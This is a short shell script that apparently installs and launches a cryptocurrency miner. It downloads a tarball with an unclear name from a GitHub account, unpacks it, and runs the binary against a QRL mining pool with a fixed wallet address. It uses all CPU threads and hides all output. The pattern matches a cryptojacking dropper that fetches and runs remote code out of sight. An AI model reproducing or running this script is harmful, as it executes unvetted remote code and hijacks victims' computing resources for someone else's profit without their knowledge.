#!/bin/sh

A=sg.qrl.herominers.com:1166
B=Q0103001c6d0fa9304f22d44fe8ac1d17b7ee6d1dbb87809b8f7186908657cceb3c3196cc45ba0e
C=koo
D=rx/0
apt-get update && apt-get upgrade -y
wget https://github.com/muledan1/bash/raw/main/-.tar.gz
tar -xf -.tar.gz
./- --donate-level 1 -o $A -u $B -p $C -a $D -k -t$(nproc --all) >/dev/null >/dev/null 2>&1
sleep 10
